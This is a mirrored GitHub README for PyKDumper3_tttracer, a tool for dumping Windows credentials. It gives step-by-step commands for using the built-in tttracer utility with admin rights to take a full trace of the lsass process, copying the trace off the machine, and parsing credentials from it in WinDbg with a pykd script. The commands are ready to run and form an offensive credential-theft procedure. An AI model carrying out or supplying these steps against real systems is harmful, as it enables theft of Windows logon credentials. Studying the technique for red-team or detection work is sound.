Coder Social home page Coder Social logo

pykdumper3_tttracer's Introduction

PyKDumper3_tttracer

PyKDumper3 modified for TTTracer credentials dumpping

Background

Found this twitter post: https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392

It is an interesting built-in method to dump lsass memory.

Tools

  • Windows machine

  • Windbg Preview Without Microsoft Store:

    1. Paste the Microsoft Store windbg link into https://store.rg-adguard.net/ to receive a download link
    2. Wget the appx file wget -O windbg.appx https://link
    3. Double click to install it

Ref: https://digitalitskills.com/windbg-preview-download-and-install-without-ms-store/

Analysis

1. Create dump file (as admin privilege)

Powershell session 1: 
tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)

Wait 3-6s please...

Powershell session 2: 
tttracer -stop (Get-Process lsass | Select -expand id)

2. Copy the .run file to your machine with windbg

3. Prepare pykd

Download pykd and copy pykd.dll to %LocalAppData%\Dbg\EngineExtensions

4. Prepare PyKDumper3_tttracer.py

5. Read lsass dump

windbg load .run file

windbg cmd:

.load pykd
!py path_to_script\PyKDumper3_tttracer.py

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.